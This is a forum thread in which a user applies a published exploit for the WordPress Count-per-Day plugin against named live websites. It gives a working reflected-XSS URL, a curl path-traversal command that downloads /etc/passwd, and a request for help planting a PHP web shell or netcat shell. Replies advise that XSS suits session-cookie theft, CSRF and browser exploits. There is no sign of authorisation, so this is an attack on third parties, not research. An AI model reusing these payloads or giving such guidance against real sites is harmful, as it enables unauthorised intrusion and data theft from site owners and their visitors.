xss scripting problem

[neusbeer]

I'm kinda stuck here..
There's a new exploit
http://www.exploit-db.com/exploits/18355/

have a target:
http://www.unrequited-love.com/

the xss with the picture loading as the examples shows works.

Code: [Select]

http://www.unrequited-love.com/blog/wp-content/plugins/count-per-day/map/map.php?map='%22));%20%3C/script%3E%3Cimg%20src=http://www.bing.com//az/hprichbg?p=rb%2fOrcaWhales_ROW818916751.jpg%3E'this brings a nice picture of a whale.

But I want to inject php or js script. How can I manage that?
I've tried everything.. 
I like to add

<?php passthru($_POST['cat /etc/passwd']); __halt_compiler();

or similar, or c99 (or other shell) or netcat command. anything..
except a picture .. *sigh*



the local file inclusion works as a charm (Note: A lot deleted download.php)

Code: [Select]

curl "http://www.armandocruz.com/wp-content/plugins/count-per-day/download.php?n=1&f=../../../../../../etc/passwd"gives the data of /etc/passwd (but has shadow.. so useless )

[ca0s]

You cannot include PHP code like that. It is a XSS, client side exploiting. PHP is executed server side.
Injecting JS should be easy. Just put it. If there is no WAF or any kind of filters, it should work.
About file inclusion, it says Arbitrary File Download, not inclusion. So that will not work to execute PHP code.

[neusbeer]

ahh ofcourse.. Stupid me ... 
tried it for the whole night long.. (about 4 hours )


What can the exploit be usefull for?
Injection a picture is not really superduper 

[ande]

Grabbing session cookies, CSRF and browser exploits. Thats about what I can think of right now.